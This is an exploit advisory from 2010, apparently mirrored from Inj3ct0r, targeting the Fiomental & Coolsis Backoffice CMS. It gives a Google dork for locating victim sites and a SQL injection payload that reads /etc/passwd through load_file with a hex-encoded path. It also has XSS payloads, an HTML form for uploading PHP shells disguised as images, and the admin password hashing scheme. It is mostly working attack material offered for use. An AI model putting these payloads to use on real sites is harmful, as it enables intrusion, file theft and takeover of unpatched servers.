Fiomental & Coolsis Backoffice Multi Vulnerability
Posted on 10 May 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Fiomental & Coolsis Backoffice Multi Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>================================================== Fiomental & Coolsis Backoffice Multi Vulnerability ================================================== ______ _ _ _ | ___ | | | | (_) | |_/ /_____ _____ | |_ _| |_ _ ___ _ __ | // _ / / _ | | | | | __| |/ _ | '_ | | __/ V / (_) | | |_| | |_| | (_) | | | | \_| \_\___| \_/ \___/|_|\__,_|\__|_|\___/|_| |_| _____ _____ _____ |_ _| | _ || _ | | | ___ __ _ _ __ ___ | |/' || |_| | | |/ _ / _` | '_ ` _ | /| |\____ | | | __/ (_| | | | | | | |_/ /.___/ / \_/\___|\__,_|_| |_| |_| \___/ \____/ DEFACEMENT it's for script kiddies... _____________________________________________________________ [$] Exploit Title : Fiomental & Coolsis Backoffice Multi Vulnerability [$] Date : 10-05-2010 [$] Author : MasterGipy [$] Email : mastergipy [at] gmail.com [$] Bug : Multi Vulnerability [$] Site : http://www.fiomental.com/ [$] Demo : http://www.fiomental.com/modelo/ [$] Google Dork : "Desenvolvido por: Fio Mental" or "Desenvolvido por: coolsis" [%] vulnerable file: index.php [BLIND SQL INJECTION] [$] Exploit: [+] http://example.pt/?cod=1 <- SQL [+] sql_1: -1' UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10 and '1'='1 [+] sql_2: -1' UNION ALL SELECT 1,2,3,load_file(0x2F6574632F706173737764),5,6,7,8,9,10 and '1'='1 [XSS] [+] http://example.pt/index.php/>"><script>alert(/LOL/)</script> [%] vulnerable file: /admin/index2.php [REMOTE ARBITRARY UPLOAD VULNERABILITY] [$] Exploit: <html> <form action="http://<-- CHANGE HERE -->/admin/index2.php?sc=up1&ac=a1" method="post" enctype="multipart/form-data" name="form1"> <p align="center"> <input name="ficheiro" type="file" class="file" id="ficheiro"> <input name="ok" type="submit" class="button" id="ok" value="OK"> </p> <p align="center">(only gif png jpg are allowed) </p> <p align="center">Files go to:&nbsp; http://example.pt/uploads/your_file.php.png</p> </form> </html> [XSS] [$] http://example.pt/admin/index2.php?&cod=1&ac=a1&tituloSc=<script>alert(/LOL/)</script> (you need to login for this one) [%] EXTRA: [$] Admin Panel Password Algorithm <?php $login = "test"; $pass = "test"; $total = md5(($login . 'fiomental').(md5($pass))); // md5($salt.md5($pass) echo "$total"; // This will Print the password Hash. ?> [§] Greetings from PORTUGAL ^^ # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-10]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>